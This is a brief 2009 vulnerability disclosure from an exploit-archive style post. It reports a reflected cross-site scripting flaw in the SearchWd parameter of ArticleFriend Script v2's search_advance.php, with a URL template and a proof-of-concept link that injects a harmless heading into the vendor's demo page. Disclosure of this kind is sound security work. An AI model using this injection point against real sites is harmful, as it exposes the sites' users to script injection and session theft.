/*

ArticleFriend Script v2 (search_advance.php SearchWd) XSS Vulnerability

Discovered by : MizoZ
Contact : mizoz@9.cn <mizozx@gmail.com>
Team : EvilWay

Date : July 29 2009

Greetings : Moudi , Zuka, All friends

*/

We can inject HTML code on the GET (SearchWd) in faille search_advance.php .

[HOST]/[PATH]/search_advance.php?SearchWd=[XSS]

Ex :
http://articlefriend.com/demo/search_advance.php?SearchWd=%3Ch1%3EMizoZ%3C/h1%3E